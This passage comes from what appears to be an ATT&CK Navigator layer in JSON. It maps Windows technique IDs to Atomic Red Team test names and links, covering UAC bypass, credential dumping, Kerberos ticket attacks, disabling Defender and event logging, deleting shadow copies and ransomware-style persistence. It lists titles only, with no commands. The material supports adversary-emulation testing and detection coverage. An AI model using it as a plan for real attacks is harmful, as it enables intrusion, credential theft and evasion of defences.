desk.cpl\n- Running DLL with .init extension and function\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1219","score":11,"enabled":true,"comment":"\n- TeamViewer Files Detected Test on Windows\n- AnyDesk Files Detected Test on Windows\n- LogMeIn Files Detected Test on Windows\n- GoToAssist Files Detected Test on Windows\n- ScreenConnect Application Download and Install on Windows\n- Ammyy Admin Software Execution\n- RemotePC Software Execution\n- NetSupport - RAT Execution\n- UltraViewer - RAT Execution\n- UltraVNC Execution\n- MSP360 Connect Execution\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":4,"enabled":true,"comment":"\n- MSXSL Bypass using local files\n- MSXSL Bypass using remote files\n- WMIC bypass using local XSL file\n- WMIC bypass using remote XSL file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":1,"enabled":true,"comment":"\n- WINWORD Remote Template Injection\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.001","score":5,"enabled":true,"comment":"\n- Take ownership using takeown utility\n- cacls - Grant permission to specified user or group recursively\n- attrib - Remove read-only attribute\n- attrib - hide file\n- Grant Full Access to folder for Everyone - Ryuk Ransomware Style\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1482","score":8,"enabled":true,"comment":"\n- Windows - Discover domain trusts with dsquery\n- Windows - Discover domain trusts with nltest\n- Powershell enumerate domains and forests\n- Adfind - Enumerate Active Directory OUs\n- Adfind - Enumerate Active Directory Trusts\n- Get-DomainTrust with PowerView\n- Get-ForestTrust with PowerView\n- TruffleSnout - Listing AD Infrastructure\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1484","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.001","score":2,"enabled":true,"comment":"\n- LockBit Black - Modify Group policy settings -cmd\n- LockBit Black - Modify Group policy settings -Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.001/T1484.001.md"}]},{"techniqueID":"T1485","score":2,"enabled":true,"comment":"\n- Windows - Overwrite file with SysInternals SDelete\n- Overwrite deleted data on C drive\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":3,"enabled":true,"comment":"\n- PureLocker Ransom Note\n- Data Encrypted with GPG4Win\n- Data Encrypt Using DiskCryptor\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":3,"enabled":true,"comment":"\n- Windows - Stop service using Service Controller\n- Windows - Stop service using net.exe\n- Windows - Stop service by killing process\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":11,"enabled":true,"comment":"\n- Windows - Delete Volume Shadow Copies\n- Windows - Delete Volume Shadow Copies via WMI\n- Windows - wbadmin Delete Windows Backup Catalog\n- Windows - Disable Windows Recovery Console Repair\n- Windows - Delete Volume Shadow Copies via WMI with PowerShell\n- Windows - Delete Backup Files\n- Windows - wbadmin Delete systemstatebackup\n- Windows - Disable the SR scheduled task\n- Disable System Restore Through Registry\n- Windows - vssadmin Resize Shadowstorage Volume\n- Modify VSS Service Permissions\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491/T1491.md"}]},{"techniqueID":"T1491.001","score":2,"enabled":true,"comment":"\n- Replace Desktop Wallpaper\n- Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1497","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":2,"enabled":true,"comment":"\n- Detect Virtualization Environment (Windows)\n- Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1505","score":6,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505/T1505.md"}]},{"techniqueID":"T1505.002","score":1,"enabled":true,"comment":"\n- Install MS Exchange Transport Agent Persistence\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505.003","score":1,"enabled":true,"comment":"\n- Web Shell Written to Disk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1505.004","score":2,"enabled":true,"comment":"\n- Install IIS Module using AppCmd.exe\n- Install IIS Module using PowerShell Cmdlet New-WebGlobalModule\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.004/T1505.004.md"}]},{"techniqueID":"T1505.005","score":2,"enabled":true,"comment":"\n- Simulate Patching termsrv.dll\n- Modify Terminal Services DLL Path\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.005/T1505.005.md"}]},{"techniqueID":"T1518","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}],"comment":"\n- Find and Display Internet Explorer Browser Version\n- Applications Installed\n- WinPwn - Dotnetsearch\n- WinPwn - DotNet\n- WinPwn - powerSQL\n"},{"techniqueID":"T1518.001","score":7,"enabled":true,"comment":"\n- Security Software Discovery\n- Security Software Discovery - powershell\n- Security Software Discovery - Sysmon Service\n- Security Software Discovery - AV Discovery via WMI\n- Security Software Discovery - AV Discovery via Get-CimInstance and Get-WmiObject cmdlets\n- Security Software Discovery - Windows Defender Enumeration\n- Security Software Discovery - Windows Firewall Enumeration\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1529","score":3,"enabled":true,"comment":"\n- Shutdown System - Windows\n- Restart System - Windows\n- Logoff System - Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1531","score":3,"enabled":true,"comment":"\n- Change User Password - Windows\n- Delete User - Windows\n- Remove Account From Domain Admin Group\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1539","score":2,"enabled":true,"comment":"\n- Steal Firefox Cookies (Windows)\n- Steal Chrome Cookies (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1539/T1539.md"}]},{"techniqueID":"T1543","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.003","score":6,"enabled":true,"comment":"\n- Modify Fax service to run PowerShell\n- Service Installation CMD\n- Service Installation PowerShell\n- TinyTurla backdoor service w64time\n- Remote Service Installation CMD\n- Modify Service to Run Arbitrary Binary (Powershell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1546","score":27,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}],"comment":"\n- Persistence with Custom AutodialDLL\n- HKLM - Persistence using CommandProcessor AutoRun key (With Elevation)\n- HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation)\n- WMI Invoke-CimMethod Start 
Process\n"},{"techniqueID":"T1546.001","score":1,"enabled":true,"comment":"\n- Change Default File Association\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546.002","score":1,"enabled":true,"comment":"\n- Set Arbitrary Binary as Screensaver\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":3,"enabled":true,"comment":"\n- Persistence via WMI Event Subscription - CommandLineEventConsumer\n- Persistence via WMI Event Subscription - ActiveScriptEventConsumer\n- Windows MOFComp.exe Load MOF File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.007","score":1,"enabled":true,"comment":"\n- Netsh Helper DLL Registration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":4,"enabled":true,"comment":"\n- Attaches Command Prompt as a Debugger to a List of Target Processes\n- Replace binary of sticky keys\n- Create Symbolic Link From osk.exe to cmd.exe\n- Atbroker.exe (AT) Executes Arbitrary Command via Registry Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.009","score":1,"enabled":true,"comment":"\n- Create registry persistence via AppCert DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.009/T1546.009.md"}]},{"techniqueID":"T1546.010","score":1,"enabled":true,"comment":"\n- Install AppInit Shim\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":3,"enabled":true,"comment":"\n- Application Shim Installation\n- New shim database files created in the default shim database directory\n- Registry key creation and/or modification events for SDB\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":3,"enabled":true,"comment":"\n- IFEO Add Debugger\n- IFEO Global Flags\n- GlobalFlags in Image File Execution Options\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":1,"enabled":true,"comment":"\n- Append malicious start-process cmdlet\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.015","score":4,"enabled":true,"comment":"\n- COM Hijacking - InprocServer32\n- Powershell Execute COM Object\n- COM Hijacking with RunDLL32 (Local Server Switch)\n- COM hijacking via TreatAs\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547","score":38,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}],"comment":"\n- Add a driver\n"},{"techniqueID":"T1547.001","score":17,"enabled":true,"comment":"\n- Reg Key Run\n- Reg Key RunOnce\n- PowerShell Registry RunOnce\n- Suspicious vbs file run from startup Folder\n- Suspicious jse file run from startup Folder\n- Suspicious bat file run from startup Folder\n- Add Executable Shortcut Link to User Startup Folder\n- Add persistance via Recycle bin\n- SystemBC Malware-as-a-Service Registry\n- Change Startup Folder - HKLM 
Modify User Shell Folders Common Startup Value\n- Change Startup Folder - HKCU Modify User Shell Folders Startup Value\n- HKCU - Policy Settings Explorer Run Key\n- HKLM - Policy Settings Explorer Run Key\n- HKLM - Append Command to Winlogon Userinit KEY Value\n- HKLM - Modify default System Shell - Winlogon Shell KEY Value \n- secedit used to create a Run key in the HKLM Hive\n- Modify BootExecute Value\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547.002","score":1,"enabled":true,"comment":"\n- Authentication Package\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.003","score":2,"enabled":true,"comment":"\n- Create a new time provider\n- Edit an existing time provider\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.003/T1547.003.md"}]},{"techniqueID":"T1547.004","score":5,"enabled":true,"comment":"\n- Winlogon Shell Key Persistence - PowerShell\n- Winlogon Userinit Key Persistence - PowerShell\n- Winlogon Notify Key Logon Persistence - PowerShell\n- Winlogon HKLM Shell Key Persistence - PowerShell\n- Winlogon HKLM Userinit Key Persistence - PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":2,"enabled":true,"comment":"\n- Modify HKLM:\\System\\CurrentControlSet\\Control\\Lsa Security Support Provider configuration in registry\n- Modify HKLM:\\System\\CurrentControlSet\\Control\\Lsa\\OSConfig Security Support Provider configuration in registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.006","score":1,"enabled":true,"comment":"\n- Snake 
Malware Kernel Driver Comadmin\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547.008","score":1,"enabled":true,"comment":"\n- Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.008/T1547.008.md"}]},{"techniqueID":"T1547.009","score":2,"enabled":true,"comment":"\n- Shortcut Modification\n- Create shortcut to cmd in startup folders\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":1,"enabled":true,"comment":"\n- Add Port Monitor persistence in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547.012","score":1,"enabled":true,"comment":"\n- Print Processors\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.012/T1547.012.md"}]},{"techniqueID":"T1547.014","score":3,"enabled":true,"comment":"\n- HKLM - Add atomic_test key to launch executable as part of user setup\n- HKLM - Add malicious StubPath value to existing Active Setup Entry\n- HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.014/T1547.014.md"}]},{"techniqueID":"T1547.015","score":1,"enabled":true,"comment":"\n- Persistence by modifying Windows Terminal profile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/T1547.015.md"}]},{"techniqueID":"T1548","score":26,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.002","score":26,"enabled":true,"comment":"\n- Bypass UAC using Event Viewer (cmd)\n- Bypass UAC using Event Viewer (PowerShell)\n- Bypass UAC using Fodhelper\n- Bypass UAC using Fodhelper - PowerShell\n- Bypass UAC using ComputerDefaults (PowerShell)\n- Bypass UAC by Mocking Trusted Directories\n- Bypass UAC using sdclt DelegateExecute\n- Disable UAC using reg.exe\n- Bypass UAC using SilentCleanup task\n- UACME Bypass Method 23\n- UACME Bypass Method 31\n- UACME Bypass Method 33\n- UACME Bypass Method 34\n- UACME Bypass Method 39\n- UACME Bypass Method 56\n- UACME Bypass Method 59\n- UACME Bypass Method 61\n- WinPwn - UAC Magic\n- WinPwn - UAC Bypass ccmstp technique\n- WinPwn - UAC Bypass DiskCleanup technique\n- WinPwn - UAC Bypass DccwBypassUAC technique\n- Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key\n- UAC Bypass with WSReset Registry Modification\n- Disable UAC - Switch to the secure desktop when prompting for elevation via registry key\n- Disable UAC notification via registry keys\n- Disable ConsentPromptBehaviorAdmin via registry keys\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1550","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550/T1550.md"}]},{"techniqueID":"T1550.002","score":3,"enabled":true,"comment":"\n- Mimikatz Pass the Hash\n- crackmapexec Pass the Hash\n- Invoke-WMIExec Pass the Hash\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550.003","score":2,"enabled":true,"comment":"\n- Mimikatz Kerberos Ticket Attack\n- Rubeus Kerberos Pass The Ticket\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.001","score":8,"enabled":true,"comment":"\n- Extracting passwords with findstr\n- Access unattend.xml\n- WinPwn - sensitivefiles\n- WinPwn - Snaffler\n- WinPwn - powershellsensitive\n- WinPwn - passhunt\n- WinPwn - SessionGopher\n- WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.002","score":2,"enabled":true,"comment":"\n- Enumeration for Credentials in Registry\n- Enumeration for PuTTY Credentials in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.004","score":7,"enabled":true,"comment":"\n- Private Keys\n- ADFS token signing and encryption certificates theft - Local\n- ADFS token signing and encryption certificates theft - Remote\n- CertUtil ExportPFX\n- Export Root Certificate with Export-PFXCertificate\n- Export Root Certificate with Export-Certificate\n- Export Certificates with Mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.006","score":2,"enabled":true,"comment":"\n- GPP Passwords (findstr)\n- GPP Passwords (Get-GPPPassword)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1553","score":8,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.003","score":1,"enabled":true,"comment":"\n- SIP (Subject Interface Package) Hijacking via Custom DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.003/T1553.003.md"}]},{"techniqueID":"T1553.004","score":3,"enabled":true,"comment":"\n- Install root CA on Windows\n- Install root CA on Windows with certutil\n- Add Root Certificate to CurrentUser Certificate Store\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":4,"enabled":true,"comment":"\n- Mount ISO image\n- Mount an ISO image and run executable from the ISO\n- Remove the Zone.Identifier alternate data stream\n- Execute LNK file from ISO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}],"comment":"\n- Extract Windows Credential Manager via VBA\n- Dump credentials from Windows Credential Manager With PowerShell [windows Credentials]\n- Dump credentials from Windows Credential Manager With PowerShell [web Credentials]\n- Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials]\n- Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials]\n- WinPwn - Loot local Credentials - lazagne\n- WinPwn - Loot local Credentials - Wifi Credentials\n- WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords\n"},{"techniqueID":"T1555.003","score":14,"enabled":true,"comment":"\n- Run Chrome-password Collector\n- LaZagne - Credentials from Browser\n- Simulating access to Chrome Login Data\n- 
Simulating access to Opera Login Data\n- Simulating access to Windows Firefox Login Data\n- Simulating access to Windows Edge Login Data\n- Decrypt Mozilla Passwords with Firepwd.py\n- Stage Popular Credential Files for Exfiltration\n- WinPwn - BrowserPwn\n- WinPwn - Loot local Credentials - mimi-kittenz\n- WinPwn - PowerSharpPack - Sharpweb for Browser Credentials\n- WebBrowserPassView - Credentials from Browser\n- BrowserStealer (Chrome / Firefox / Microsoft Edge)\n- Dump Chrome Login Data with esentutl\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555.004","score":2,"enabled":true,"comment":"\n- Access Saved Credentials via VaultCmd\n- WinPwn - Loot local Credentials - Invoke-WCMDump\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.004/T1555.004.md"}]},{"techniqueID":"T1556","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.002","score":1,"enabled":true,"comment":"\n- Install and Register Password Filter DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1557","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557/T1557.md"}]},{"techniqueID":"T1557.001","score":1,"enabled":true,"comment":"\n- LLMNR Poisoning with Inveigh (PowerShell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558","score":13,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558/T1558.md"}]},{"techniqueID":"T1558.001","score":2,"enabled":true,"comment":"\n- Crafting Active Directory golden tickets with mimikatz\n- Crafting Active Directory golden tickets with Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.002","score":1,"enabled":true,"comment":"\n- Crafting Active Directory silver tickets with mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.002/T1558.002.md"}]},{"techniqueID":"T1558.003","score":7,"enabled":true,"comment":"\n- Request for service tickets\n- Rubeus kerberoast\n- Extract all accounts in use as SPN using setspn\n- Request A Single Ticket via PowerShell\n- Request All Tickets via PowerShell\n- WinPwn - Kerberoasting\n- WinPwn - PowerSharpPack - Kerberoasting Using Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":3,"enabled":true,"comment":"\n- Rubeus asreproast\n- Get-DomainUser with PowerView\n- WinPwn - PowerSharpPack - Kerberoasting Using Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559/T1559.md"}],"comment":"\n- Cobalt Strike Artifact Kit pipe\n- Cobalt Strike Lateral Movement (psexec_psh) pipe\n- Cobalt Strike SSH (postex_ssh) pipe\n- Cobalt Strike post-exploitation pipe (4.2 and later)\n- Cobalt Strike post-exploitation pipe (before 4.2)\n"},{"techniqueID":"T1559.002","score":3,"enabled":true,"comment":"\n- Execute Commands\n- Execute PowerShell script via Word DDE\n- 
DDEAUTO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}],"comment":"\n- Compress Data for Exfiltration With PowerShell\n"},{"techniqueID":"T1560.001","score":5,"enabled":true,"comment":"\n- Compress Data for Exfiltration With Rar\n- Compress Data and lock with password for Exfiltration with winrar\n- Compress Data and lock with password for Exfiltration with winzip\n- Compress Data and lock with password for Exfiltration with 7zip\n- ESXi - Remove Syslog remote IP\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1562","score":58,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}],"comment":"\n- Windows Disable LSA Protection\n"},{"techniqueID":"T1562.001","score":33,"enabled":true,"comment":"\n- Unload Sysmon Filter Driver\n- Uninstall Sysmon\n- AMSI Bypass - AMSI InitFailed\n- AMSI Bypass - Remove AMSI Provider Reg Key\n- Disable Arbitrary Security Windows Service\n- Tamper with Windows Defender ATP PowerShell\n- Tamper with Windows Defender Command Prompt\n- Tamper with Windows Defender Registry\n- Disable Microsoft Office Security Features\n- Remove Windows Defender Definition Files\n- Stop and Remove Arbitrary Security Windows Service\n- Uninstall Crowdstrike Falcon on Windows\n- Tamper with Windows Defender Evade Scanning -Folder\n- Tamper with Windows Defender Evade Scanning -Extension\n- Tamper with Windows Defender Evade Scanning -Process\n- Disable Windows Defender with DISM\n- Disable Defender Using NirSoft AdvancedRun\n- Kill antimalware protected processes using Backstab\n- WinPwn - Kill the event log services 
for stealth\n- Tamper with Windows Defender ATP using Aliases - PowerShell\n- LockBit Black - Disable Privacy Settings Experience Using Registry -cmd\n- LockBit Black - Use Registry Editor to turn on automatic logon -cmd\n- LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell\n- Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell\n- Disable Windows Defender with PwSh Disable-WindowsOptionalFeature\n- WMIC Tamper with Windows Defender Evade Scanning Folder\n- Delete Windows Defender Scheduled Tasks\n- Disable Hypervisor-Enforced Code Integrity (HVCI)\n- AMSI Bypass - Override AMSI via COM\n- Tamper with Windows Defender Registry - Reg.exe\n- Tamper with Windows Defender Registry - Powershell\n- Delete Microsoft Defender ASR Rules - InTune\n- Delete Microsoft Defender ASR Rules - GPO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":7,"enabled":true,"comment":"\n- Disable Windows IIS HTTP Logging\n- Disable Windows IIS HTTP Logging via PowerShell\n- Kill Event Log Service Threads\n- Impair Windows Audit Log Policy\n- Clear Windows Audit Policy Config\n- Disable Event Logging with wevtutil\n- Makes Eventlog blind with Phant0m\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.004","score":10,"enabled":true,"comment":"\n- Disable Microsoft Defender Firewall\n- Disable Microsoft Defender Firewall via Registry\n- Allow SMB and RDP on Microsoft Defender Firewall\n- Opening ports for proxy - HARDRAIN\n- Open a local port through Windows Firewall to any profile\n- Allow Executable Through Firewall Located in Non-Standard Location\n- LockBit Black - Unusual Windows firewall registry modification -cmd\n- LockBit Black - Unusual Windows firewall registry modification -Powershell\n- Blackbit - Disable 
